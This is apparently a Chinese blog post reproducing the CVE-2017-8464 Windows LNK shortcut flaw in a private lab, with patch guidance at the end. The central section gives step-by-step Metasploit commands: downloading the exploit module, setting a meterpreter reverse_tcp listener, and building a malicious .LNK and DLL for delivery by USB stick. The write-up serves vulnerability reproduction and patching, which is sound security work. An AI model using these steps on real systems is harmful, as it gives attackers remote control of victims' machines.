LNK文件(快捷方式)远程代码执行漏洞(复现)

介绍

名称:CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞

概要:攻击者可以通过可移动驱动器(U盘)或远程共享等方式将包含恶意LNK文件和与之相关的恶意二进制文件传播给用户。当用户通过Windows资源管理器或任何能够解析LNK文件的程序打开恶意的LNK文件时,与之关联的恶意二进制代码将在目标系统上执行。

复现:

攻击机kali:192.168.86.180

靶机win10(64位):192.168.86.177

首先kali下载exp:

1
2
cd /opt
Wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb

copy exp到/usr/share/metasploit-framework/modules/exploit/windows/smb/目录下
cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

生成监听shell

1
2
3
4
msf > use exploit/multi/handler   使用exploit/multi/handler监听连入的backdoor
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp 设置对应的payload
msf exploit(handler) > set LHOST 192.168.86.180
msf exploit(handler) > exploit -j

生成.LNK文件

1
2
3
4
use exploit/windows/smb/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.86.180
msf exploit(cve_2017_8464_lnk_rce) > exploit

将生成的dll文件和以U盘盘符结尾的.LNK文件复制到U盘中;当插入U盘至主机,在靶机上双击.LNK文件,即可触发dll文件建立连接。

q-1
q-2

影响版本:

桌面系统:Windows 10, 7, 8.1, 8, Vista和Windows RT 8.1
服务器系统:Windows Server 2016,2012,2008

修复:

桌面系统Windows 10,7,8.1和Windows RT 8.1;服务器系统:Windows Server 2016,2012,2008,可以通过Windows Update自动更新微软补丁的方式进行修复。
Windows 8, Vista可以通过选择对应版本然后手动更新补丁的方式进行更新
(补丁下载地址参考)https://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms

-------------本文结束感谢您的阅读-------------
  • Post author: SuNu11
  • Post link: http://sunu11.com/2017/08/29/17/
  • Copyright Notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.